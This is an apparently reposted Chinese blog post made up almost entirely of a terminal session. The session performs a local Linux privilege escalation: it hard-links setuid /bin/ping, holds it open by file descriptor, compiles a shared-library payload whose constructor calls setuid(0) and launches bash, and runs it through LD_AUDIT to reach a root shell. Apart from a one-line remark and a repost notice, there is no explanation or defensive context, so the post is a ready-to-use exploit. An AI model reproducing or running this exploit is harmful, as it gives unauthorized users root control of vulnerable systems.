[met3or@c3 /]$ ls -al |grep exp
drwxrwxrwx   2 root root    4096 Oct 19 19:25 exp
[met3or@c3 /]$ cd exp
[met3or@c3 exp]$ mkdir exploit
[met3or@c3 exp]$ ls -al
drwxrwxrwx 3 root   root   4096 Oct 19 19:26 .
drwxr-xr-x 26 root   root   4096 Oct 19 19:24 ..
drwxrwxr-x 2 met3or met3or 4096 Oct 19 19:26 exploit
[met3or@c3 exp]$ ln /bin/ping /exp/exploit/target
[met3or@c3 exp]$ exec 3< /exp/exploit/target 
[met3or@c3 exp]$ ls -l /proc/$$/fd/3
lr-x------ 1 met3or met3or 64 Oct 19 19:25 /proc/6030/fd/3 -> /exp/exploit/target
[met3or@c3 exp]$ rm -rf /exp/exploit/
[met3or@c3 exp]$ ls -l /proc/$$/fd/3 
lr-x------ 1 met3or met3or 64 Oct 19 19:25 /proc/6030/fd/3 -> /exp/exploit/target (deleted)
[met3or@c3 exp]$ cat > payload.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
[met3or@c3 exp]$ gcc -w -fPIC -shared -o /exp/exploit payload.c
[met3or@c3 exp]$ ls -l /exp/exploit
-rwxrwxr-x 1 met3or met3or 4223 Oct 19 19:27 /exp/exploit
[met3or@c3 exp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@c3 exp]# whoami
root
[root@c3 exp]# id
uid=0(root) gid=510(met3or) groups=510(met3or)

看的懂的人懂，看不懂的熟悉linux相关基础知识去~

本文转hackfreer51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/440265，如需转载请自行联系原作者